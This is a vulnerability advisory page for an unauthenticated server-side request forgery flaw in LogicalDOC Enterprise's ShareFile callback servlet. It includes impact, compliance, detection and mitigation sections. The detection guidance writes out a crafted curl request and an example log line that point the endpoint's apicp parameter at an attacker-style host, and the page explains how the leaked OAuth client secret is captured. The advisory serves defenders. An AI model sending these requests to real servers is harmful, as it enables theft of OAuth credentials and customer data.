CVE-2025-45869
Deferred Deferred - Pending Action

Server-Side Request Forgery in LogicalDOC Enterprise

Vulnerability report for CVE-2025-45869, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-13

Last updated on: 2026-07-13

Assigner: MITRE

Description

LogicalDOC Enterprise Version up to and before v9.1.1 is vulnerable to Server-Side Request Forgery (SSRF). An unauthenticated attacker can exploit the ShareFileCallback servlet by manipulating input parameters to trigger a server-side request to an attacker-controlled host.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-07-13
Last Modified
2026-07-13
Generated
2026-07-14
AI Q&A
2026-07-13
EPSS Evaluated
N/A
NVD

Affected Vendors & Products

Showing 1 associated CPE
Vendor Product Version / Range
logicaldoc enterprise to 9.1.1 (exc)

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-918 The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

CVE-2025-45869 is an unauthenticated Server-Side Request Forgery (SSRF) vulnerability affecting LogicalDOC Enterprise versions up to and including 9.1.1. The vulnerability resides in the ShareFileCallback servlet, which lacks proper authentication and input validation.

An attacker can exploit this flaw by manipulating input parameters such as `apicp` and `subdomain` in requests to the `/sharefile-callback` endpoint. This manipulation forces the server to initiate outbound OAuth token requests to attacker-controlled hosts.

  • The `state` parameter, used to identify users, is sequentially ordered, which may enable user enumeration.
  • OAuth client ID and secret credentials are sent in these requests, allowing an attacker to capture them by operating a fake HTTPS endpoint.

Successful exploitation could lead to unauthorized access to ShareFile data linked to affected accounts.

Impact Analysis

This vulnerability can have several significant impacts if exploited:

  • Unauthorized access to sensitive ShareFile data linked to affected accounts, potentially exposing confidential or proprietary information.
  • Compromise of OAuth client credentials (client ID and secret), which could be used to impersonate the LogicalDOC application and gain further access to integrated services.
  • User enumeration due to the sequentially ordered `state` parameter, allowing attackers to gather information about valid users in the system.
  • Potential for further attacks, such as phishing or lateral movement within a network, if the attacker leverages the captured credentials or accessed data.
Compliance Impact

This vulnerability can have serious implications for compliance with common standards and regulations, depending on the type of data handled by the affected LogicalDOC Enterprise instance:

  • **GDPR (General Data Protection Regulation):** If the system processes personal data of EU citizens, unauthorized access to this data due to the SSRF vulnerability could constitute a data breach. GDPR requires organizations to implement appropriate security measures to protect personal data and report breaches within 72 hours. Failure to do so could result in significant fines (up to 4% of global annual revenue or €20 million, whichever is higher).
  • **HIPAA (Health Insurance Portability and Accountability Act):** If LogicalDOC is used to store or process protected health information (PHI), exploitation of this vulnerability could lead to unauthorized access to PHI. This would be considered a breach under HIPAA, requiring notification to affected individuals, the Department of Health and Human Services (HHS), and potentially the media. Non-compliance can result in fines ranging from $100 to $50,000 per violation, with a maximum penalty of $1.5 million per year.
  • **Other Standards (e.g., ISO 27001, SOC 2):** The vulnerability undermines security controls related to access management, data protection, and risk management. Organizations certified under these standards may face non-compliance if they fail to address the vulnerability promptly, potentially leading to loss of certification or reputational damage.

To maintain compliance, organizations should apply the vendor patch or upgrade to LogicalDOC 9.2 as soon as it becomes available, enforce authentication on the callback endpoint, and validate all host-related parameters against trusted domains.

Detection Guidance

To detect the CVE-2025-45869 SSRF vulnerability in LogicalDOC Enterprise, you can monitor network traffic for unusual outbound requests originating from the LogicalDOC server, particularly to untrusted or attacker-controlled hosts. The vulnerability is exploited via the `/sharefile-callback` endpoint with manipulated `apicp` and `subdomain` parameters.

  • Check server logs for requests to `/sharefile-callback` with suspicious or unexpected `apicp`/`subdomain` values. Example log entry: `GET /sharefile-callback?apicp=malicious.example.com&subdomain=attacker`
  • Use network monitoring tools (e.g., Wireshark, tcpdump) to inspect outbound HTTP/HTTPS traffic from the LogicalDOC server. Look for requests to unknown domains or IPs. Example command: `tcpdump -i eth0 -s 0 -A 'tcp port 80 or tcp port 443 and host <LogicalDOC_Server_IP>'`
  • Test for the vulnerability by sending a crafted request to the `/sharefile-callback` endpoint and observing if the server initiates a connection to an external host. Example curl command: `curl -v 'http://<LogicalDOC_Server>/sharefile-callback?apicp=example.com&subdomain=test'` (Note: Only perform this in a controlled environment with permission.)

If the server responds with an OAuth-related request (e.g., containing client ID/secret) to the specified domain, the system is likely vulnerable.

Mitigation Strategies

To mitigate CVE-2025-45869, follow these immediate steps:

  • Apply the vendor patch or upgrade to LogicalDOC Enterprise version 9.2 or later as soon as it becomes available. The vendor has acknowledged the issue and plans to address it in this release.
  • Restrict access to the `/sharefile-callback` endpoint by enforcing authentication. Ensure only authorized users can access this servlet.
  • Validate all host-related parameters (e.g., `apicp`, `subdomain`) in the `/sharefile-callback` endpoint against a whitelist of trusted ShareFile domains. Reject requests with untrusted or unexpected values.
  • Implement a cryptographically bound OAuth `state` parameter to prevent user enumeration and ensure the integrity of OAuth flows.
  • Monitor network traffic for suspicious outbound requests from the LogicalDOC server, particularly to unknown or untrusted domains.
  • Consider temporarily disabling the ShareFile integration if it is not critical to business operations until a patch is applied.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2025-45869. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart